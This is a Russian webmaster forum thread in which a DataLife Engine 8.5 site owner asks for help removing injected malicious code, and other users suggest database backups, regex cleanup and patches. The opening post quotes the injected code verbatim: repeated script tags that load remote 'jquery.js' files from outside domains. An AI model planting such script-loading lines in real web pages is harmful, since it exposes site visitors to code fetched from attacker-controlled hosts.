Взломали сайт на DLE (вредоносный код)

12 3
W1
На сайте с 23.01.2011
Offline
19
3708

Вот такую дрянь я сегодня обнаружил (после жалобы хостинга о нагрузке) в новостях сайта DLE


<script src="http://kjdsfgjkdsfiki.ru/jquery.js" type="text/javascript"></script>
<script src="http://kjdsfgjkdsfiki.ru/jquery.js" type="text/javascript">// <![CDATA[ <script async="async" type="text/javascript" src="http://kjdsfgjkdsfiki.ru/jquery.js">
// ]]></script>
<script src="http://kjdsfgjkdsfiki.ru/jquery.js" type="text/javascript"></script>
<script src="http://trafflix.myjino.ru/jquery.js" type="text/javascript">// <![CDATA[ <script async="async" type="text/javascript" src="http://kjdsfgjkdsfiki.ru/jquery.js">
// ]]></script>
<script src="http://kjdsfgjkdsfiki.ru/jquery.js" type="text/javascript">// <![CDATA[ <script async="async" type="text/javascript" src="http://kjdsfgjkdsfiki.ru/jquery.js">
// ]]></script>
...бла бла бла и еще много много много вниз. Автор "мегакулцхакер" не пожадничал для меня своего "чудо-кода".

использую DLE 8.5 старенькую. Знаю, что давно пора обновиться, но все никак не доходят руки. Раньше уже подобным образом взламывали, я восстанавливал бэкапами и ставил заплатки. Сейчас бэкапов нет, метод чистки от igoryanzx1 из этой темы /ru/forum/589759 не помог, скрипт из бд удаляться не хочет.

Я так понимаю новые дырки появились. Помогите как убрать эту дрянь кроме как править вручную? Из за нее огромная нагрузка на сайт, страница грузится полчаса и хостинг грозит заблокировать.

siv1987
На сайте с 02.04.2009
Offline
427
#1

Лол, а каким образом нагрузка хостинга связано с исполнением чужих скриптов в браузере пользователя? То что страница долго рендерится в браузере это понятно, но к хостингу не имеет никакого отношения.

W1
На сайте с 23.01.2011
Offline
19
#2

Спорить не буду, но после это взлома мне и начали приходить сообщения о нагрузке, да и бд размером выросла в 100 раз, страницы стали дольше загружаться. В общем не в этом суть.

BadBoy
На сайте с 31.01.2005
Offline
308
#3

У меня такое было, решение не сложное, если регулярку получится сделать )

1. надо сделать бекап базы

2. потом открыть ее в notepad++

3. CTRL + H (заменить)

4. Самое сложное, надо правильно написать строку регулярных выражений...

Так я же проблема тут в соседней ветке, седня ночью пытался отчистить бд, но получилось немного криво, половина контента не выводится...

надо просто разбираться в регулярках.

вот кстати тема - /ru/forum/757798

siv1987
На сайте с 02.04.2009
Offline
427
#4
webmaster116:
Спорить не буду, но после это взлома мне и начали приходить сообщения о нагрузке, да и бд размером выросла в 100 раз

Нагрузка наверное создается из-за запроса или скрипта который вносит в бд вредоносный код. Найдите специалиста который составит регулярку конкретно под ваш случай для удаления скрипта. Встречался с таким, проблема там в том, что код добавляется образом <script src='script'><script src='script'><script src='script'></script></script></script>Текст<script src='script'>

BadBoy
На сайте с 31.01.2005
Offline
308
#5

Посмотрел код на свежую голову...

у человека вот в этой теме ( /ru/forum/757798 )

не знаю как у вас, но судя по одному и тому же урлу, готов предположить, что взломал вас один и тот же человек, с одинаковыми методами.

Так вот, там, часть нужного контента повреждена и восстановить ее просто нет возможности, если нет бекапа, то "давай до свидания"

Или последняя возможность, обратиться к формчанину по имени Хортица, он спец по дле.

W1
На сайте с 23.01.2011
Offline
19
#6

Да времени нет искать людей, хостинг вот вот заблочит. Придется наверно править ручками. Кто нибудь в курсе как взломали? И есть ли заплатки от этого?

KySoK
На сайте с 30.10.2011
Offline
46
#7

А у вас какая лицензия ? или нуль ?

RSSTranslator (http://u.to/IY8iBA) — это сервис автоматической трансляции (публикации) ваших RSS-каналов и блогов в социальных сетях
A
На сайте с 20.08.2010
Offline
775
#8

Хостинг джино небось?

Руслан Исмаилов
На сайте с 30.03.2007
Offline
198
#9

Посматривайте офф сайт длешки, недавно вышла новая дырка.

W1
На сайте с 23.01.2011
Offline
19
#10

спасибо. у меня нуль, но чистый. три года норм работал всего один раз хакали. в общем в любом случае придется править вручную, так как пропало часть контента - обложки. ~700 новостей..эх

12 3

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий